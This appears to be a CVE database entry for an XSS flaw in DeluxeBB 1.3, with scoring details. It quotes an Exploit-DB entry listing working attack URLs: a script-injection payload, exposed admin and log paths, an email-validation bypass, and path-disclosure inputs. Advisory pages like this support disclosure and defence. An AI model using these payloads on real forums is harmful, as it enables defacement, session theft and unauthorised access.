CVE-2009-4468 : Detail

CVE-2009-4468

Cross-site Scripting
A03-Injection
0.72%V4
Network
2009-12-30
18h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in misc.php in DeluxeBB 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 10598

Publication date : 2009-12-21 23h00 +00:00
Author : cp77fk4r
EDB Verified : Yes

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com> # Vendor: http://www.deluxebb.com # #[Directory Listing] http://server/templates/ http://server/images/ http://server/logs/ http://server/wysiwyg/ http://server/docs/ http://server/classes http://server/lang http://server/settings/ # # #[Cross Site Scripting] http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E # # #[Unprotected Admin Panel Files] http://server/templates/deluxe/admincp/ http://server/templates/corporate/admincp/ http://server/templates/blue/admincp/ # # #[Unprotected Log Files] http://server/logs/cp.php # # #[Mail Registration Validation Bypass] After the user registration procedure, Simply enter to the link: http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r you can get your [USER_ID] on the last page of Member-List section: http://server/misc.php?sub=memberlist&page=[LAST_PAGE] # # # #[Full Path Disclosure] http://server/misc.php?sub=memberlist&page=-11111111111111111 -you'll get an error like: Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..] or: http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF -you'll get an error like: Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..] # # #[E0F]

Products Mentioned

Configuraton 0

Deluxebb>>Deluxebb >> Version 1.3

References

http://www.securityfocus.com/bid/37448
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/10598
Tags : exploit, x_refsource_EXPLOIT-DB